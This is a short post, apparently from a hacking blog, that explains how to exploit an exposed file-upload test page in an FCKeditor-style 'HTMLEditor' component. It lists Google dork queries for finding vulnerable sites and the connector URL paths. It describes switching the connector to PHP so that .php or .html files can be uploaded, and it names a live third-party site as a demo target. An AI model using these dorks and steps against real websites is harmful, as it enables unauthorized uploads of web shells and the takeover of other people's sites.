Html Editor File Upload Vulnerability
Google Dork : inurl:/HTMLEditor/editor/
or “inurl:/HTMLEditor/editor//filemanager/”
or “inurl:/HTMLEditor/editor//filemanager//connectors/”
Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Go here :
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
chnage connectors into PhP (Like FCKeditor) and upload Your file
chnage connectors into PhP (Like FCKeditor) and upload Your file
Suppoted files : .TXT and .JPG in some site you can upload .html and .php too
To view you file goto : http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here
Live Demo : http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
0 comments:
Post a Comment